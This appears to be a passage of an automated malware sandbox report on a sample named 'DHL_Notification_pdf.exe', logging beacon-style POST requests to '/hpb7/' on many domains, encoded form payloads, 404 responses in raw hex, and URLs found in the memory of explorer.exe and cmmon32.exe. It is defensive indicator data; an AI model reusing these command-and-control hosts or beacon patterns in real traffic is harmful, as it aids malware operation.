Ascii: pgoMAr2=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oN~SPhoMVu5fPFIIXoBXZzi-M.
Source: global traffic | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.bohndigitaltech.com | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.bohndigitaltech.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bohndigitaltech.com/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 70 67 6f 4d 41 72 32 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 56 53 38 77 58 5a 28 5f 4b 69 41 4b 75 32 46 6c 64 39 62 79 62 61 77 2e 00 00 00 00 00 00 00 00 | Data Ascii: pgoMAr2=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCVS8wXZ(_KiAKu2Fld9bybaw.
Source: global traffic | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.rifleroofers.com | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.rifleroofers.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.rifleroofers.com/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 70 67 6f 4d 41 72 32 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 6c 30 43 58 66 75 4a 63 51 5f 43 72 7a 77 35 45 70 77 32 48 7e 37 30 2e 00 00 00 00 00 00 00 00 | Data Ascii: pgoMAr2=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRel0CXfuJcQ_Crzw5Epw2H~70.
Source: global traffic | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.denko-kosan.com | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.denko-kosan.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.denko-kosan.com/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 70 67 6f 4d 41 72 32 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 56 2d 46 66 46 52 71 72 66 4d 66 43 58 73 45 64 36 61 4c 43 47 70 45 2e 00 00 00 00 00 00 00 00 | Data Ascii: pgoMAr2=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFV-FfFRqrfMfCXsEd6aLCGpE.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:29:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd 
c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:47 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 
63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:50 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 
73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 20 Mar 2023 10:29:57 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 20 Mar 2023 10:29:59 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-litespeed-tag: 735_HTTP.404 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/" | x-litespeed-cache-control: no-cache | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Mon, 20 Mar 2023 10:30:05 GMT | server: LiteSpeed | Data Ascii: 5253
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 20 Mar 2023 10:30:13 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 20 Mar 2023 10:30:16 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000002.523730403.0000000014FCA000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.00000000056BA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://kunimi.org/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsC
          Source: DHL_Notification_pdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.523730403.00000000157A4000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.0000000005E94000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.0dhy.xyz
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.0dhy.xyz/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.admet01.club
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.admet01.club/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.admet01.clubReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.adoptiveimmunotech.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.adoptiveimmunotech.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.amirah.cfd/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.amirah.cfdReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bisarropainting.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bisarropainting.com/hpb7/:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bisarropainting.comReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bohndigitaltech.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bohndigitaltech.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bohndigitaltech.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.buymyenergy.com
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.buymyenergy.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.buymyenergy.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.creative-shield.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.creative-shield.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.creative-shield.com/hpb7/:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.creative-shield.comReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.denko-kosan.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.denko-kosan.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.denko-kosan.comReferer:
